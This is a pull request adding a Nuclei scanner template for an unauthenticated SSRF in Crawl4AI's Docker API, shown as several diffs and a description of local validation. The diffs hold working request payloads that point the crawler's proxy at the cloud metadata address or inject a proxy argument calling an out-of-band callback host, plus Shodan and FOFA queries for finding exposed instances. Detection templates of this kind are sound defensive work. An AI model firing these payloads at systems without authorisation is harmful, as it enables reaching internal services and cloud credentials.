### PR TITLE
Add CVE-2026-53755 template

### DIFF
--- a/http/cves/2026/CVE-2026-53755.yaml
+++ b/http/cves/2026/CVE-2026-53755.yaml
@@ -1,47 +1,58 @@
-id: cve-2026-53755-crawl4ai-proxy-ssrf
+id: CVE-2026-53755
 
 info:
-  name: Crawl4AI <= 0.8.8 Docker API Proxy Configuration SSRF (CVE-2026-53755)
+  name: crawl4ai < 0.8.9 - Unauthenticated SSRF
   author: str4k3r
   severity: high
-  description: >
-    The Crawl4AI Docker API accepted an unauthenticated proxy_config.server
-    value in the crawl request without validating it against private or
-    reserved address ranges, letting an attacker route the browser's outbound
-    traffic through an internal destination such as the cloud metadata
-    endpoint. Fixed in 0.8.9, which validates the proxy destination before
-    use and rejects private/reserved targets with an SSRF-protection error.
+  description: |
+    Crawl4AI < 0.8.9 contains a server-side request forgery caused by insufficient SSRF destination checks on proxy addresses in browser and crawler configurations, letting unauthenticated attackers access internal services and cloud metadata endpoints.
+  impact: |
+    Unauthenticated attackers can access internal services and cloud metadata, potentially leading to sensitive information disclosure and further network compromise.
+  remediation: |
+    Update to version 0.8.9 or later.
   reference:
     - https://github.com/unclecode/crawl4ai/security/advisories/GHSA-6qhc-x826-342c
-    - https://nvd.nist.gov/vuln/detail/CVE-2026-53755
   classification:
-    cve-id: CVE-2026-53755
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N
+    cvss-score: 8.2
     cwe-id: CWE-918
   metadata:
     verified: true
     max-request: 1
-  tags: cve,cve2026,crawl4ai,ssrf,unauth
+    shodan-query: 'title:"crawl4ai"'
+    fofa-query: 'body="crawl4ai"'
+  tags: cve,cve2026,crawl4ai,ssrf,unauth,proxy,oast
+
+flow: http(1) && http(2)
 
 http:
-  - method: POST
-    path:
-      - "{{BaseURL}}/crawl"
-    headers:
-      Content-Type: application/json
-    body: '{"urls":["http://example.com"],"browser_config":{"proxy_config":{"server":"http://169.254.169.254:80"}}}'
-    matchers-condition: and
+  - raw:
+      - |
+        GET / HTTP/1.1
+        Host: {{Hostname}}
+
+    host-redirects: true
+    max-redirects: 3
+
     matchers:
-      - type: status
-        status:
-          - 500
-      - type: word
-        part: body
-        words:
-          - "Failed on navigating"
-          - "ERR_TIMED_OUT"
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains_any(body, "crawl4ai", "Crawl4AI", "Crawl4ai")'
         condition: and
-      - type: word
-        part: body
-        negative: true
-        words:
-          - "Proxy destination blocked"
+        internal: true
+
+  - raw:
+      - |
+        POST /crawl HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+
+        {"urls":["http://example.com"],"browser_config":{"type":"BrowserConfig","params":{"headless":true,"extra_args":["--proxy-server=http://{{interactsh-url}}"]}},"crawler_config":{"type":"CrawlerRunConfig","params":{"cache_mode":"BYPASS","page_timeout":8000}}}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains_any(interactsh_protocol, "http", "dns")'
+        condition: and

--- a/http/cves/2026/CVE-2026-53755.yaml
+++ b/http/cves/2026/CVE-2026-53755.yaml
@@ -1,0 +1,47 @@
+id: cve-2026-53755-crawl4ai-proxy-ssrf
+
+info:
+  name: Crawl4AI <= 0.8.8 Docker API Proxy Configuration SSRF (CVE-2026-53755)
+  author: str4k3r
+  severity: high
+  description: >
+    The Crawl4AI Docker API accepted an unauthenticated proxy_config.server
+    value in the crawl request without validating it against private or
+    reserved address ranges, letting an attacker route the browser's outbound
+    traffic through an internal destination such as the cloud metadata
+    endpoint. Fixed in 0.8.9, which validates the proxy destination before
+    use and rejects private/reserved targets with an SSRF-protection error.
+  reference:
+    - https://github.com/unclecode/crawl4ai/security/advisories/GHSA-6qhc-x826-342c
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-53755
+  classification:
+    cve-id: CVE-2026-53755
+    cwe-id: CWE-918
+  metadata:
+    verified: true
+    max-request: 1
+  tags: cve,cve2026,crawl4ai,ssrf,unauth
+
+http:
+  - method: POST
+    path:
+      - "{{BaseURL}}/crawl"
+    headers:
+      Content-Type: application/json
+    body: '{"urls":["http://example.com"],"browser_config":{"proxy_config":{"server":"http://169.254.169.254:80"}}}'
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 500
+      - type: word
+        part: body
+        words:
+          - "Failed on navigating"
+          - "ERR_TIMED_OUT"
+        condition: and
+      - type: word
+        part: body
+        negative: true
+        words:
+          - "Proxy destination blocked"

--- a/http/cves/2026/CVE-2026-53755.yaml
+++ b/http/cves/2026/CVE-2026-53755.yaml
@@ -1,7 +1,7 @@
 id: CVE-2026-53755
 
 info:
-  name: crawl4ai < 0.8.9 - Unauthenticated SSRF
+  name: crawl4ai < 0.8.9 - Server Side Request Forgery
   author: str4k3r
   severity: high
   description: |


### PR DESCRIPTION
Adds the Nuclei template for **CVE-2026-53755** (Crawl4AI <= 0.8.8 Docker API unauthenticated SSRF via `proxy_config.server`) as an ecosystem contribution. Fixed in 0.8.9, which validates the proxy destination before use.

Advisory: https://github.com/unclecode/crawl4ai/security/advisories/GHSA-6qhc-x826-342c

Validated locally with real Nuclei against official Docker images (0.8.0 vulnerable / 0.8.9 fixed), 3x/3x deterministic, using a self-contained differential (no external OOB/interactsh dependency): pointing `proxy_config.server` at a link-local address triggers an outbound proxy attempt (HTTP 500, `ERR_TIMED_OUT`) on vulnerable versions, while the fixed version validates the destination first and rejects it (HTTP 400, SSRF-protection error) before any network attempt.

The template follows the repository format and references the public advisory.